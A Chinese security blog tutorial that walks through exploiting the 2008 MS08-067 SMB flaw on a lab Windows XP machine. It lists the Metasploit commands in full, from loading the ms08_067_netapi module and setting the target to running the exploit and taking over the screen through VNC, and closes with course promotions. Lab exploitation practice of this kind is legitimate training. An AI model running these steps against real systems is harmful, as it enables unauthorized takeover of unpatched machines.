那个打爆XP系统的漏洞,你会用么?
2022-11-11 07:31:43 Author: 网络安全自修室(查看原文) 阅读量:27 收藏

点击上方蓝字关注我们

1
免责声明
      本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,遵守国家相关法律法规,请勿用于违法用途如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览

1.首先需要下载kali安装到VMware中,如何安装参考我之前的文本,要想复现该经典漏洞MS08_067需要一个xp系统,防火墙关闭。这里xp系统的安装就不多做介绍了。

2.下载好kali后需要验证网络是否通畅,出现以下界面则网络通畅

ping www.baidu.com

若网络不通畅则检查自己的虚拟机设置

3.打开msfconsole工具

msfconsole

4.查找ms08_067,ms代表微软,08则代表08年发现的漏洞,067代表当年发现的第67个漏洞

search ms08_067

5.使用上面的Name下面的漏洞名称

use exploit/windows/smb/ms08_067_netapi

6.显示配置信息

其中rhost为远程主机ip,我们设置成有ms08_067漏洞的xp系统的ip,用下面的命令进行设置。

7.设置rhost

set rhost 192.168.201.95 注意这里的ip为xp系统的ip地址

8.显示配置信息查看是否配置成功。如图rhost后面有ip地址则配置成功。

9.我们查看target,用如下的命令

show targets

8.设置与自己系统相同的版本,这里我选择34,设置方式如下:

set target 34

9.好了到这里就配置结束了,我们开始运行:

exploit

出现如下我们就成功了,已经获得了最高权限,可以进行各种操作了。

10.例如我们输入如下命令,查看对方屏幕,效果如下图:

run vnc

如果想要系统学习网络安全技术

不妨加入知识星球课程

《60天入门网络安全渗透测试》

从入门到案例,贴合实战

轻松易懂、好玩实用

限时领取

知识星球

超值 | 一起学网络安全! 授人以鱼不如授人以渔!

跟着60天入门学习路线一起学

期待你的到来!

往期推荐

从入门到入狱的技术,可以学,别乱用!

网络安全学习方向和资源整理(建议收藏)

一个web安全工程师的基础学习规划

资源 | 渗透测试工程师入门教程(限时领取)

5年老鸟推荐10个玩Python必备的网站

推荐十个成为网络安全渗透测试大佬的学习必备网站!

那些社工师不为人知的秘密。。。

更多内容请关注公众号

网络安全自修室

点个在看你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0NDYxMzk1Mg==&mid=2247497130&idx=1&sn=984afaf3656c1b2774acd36ab03449c3&chksm=e959a385de2e2a93dc41aa6908535452deaaebe6f173401de81ab455542b600725c83fdc3d94#rd
如有侵权请联系:admin#unsafe.sh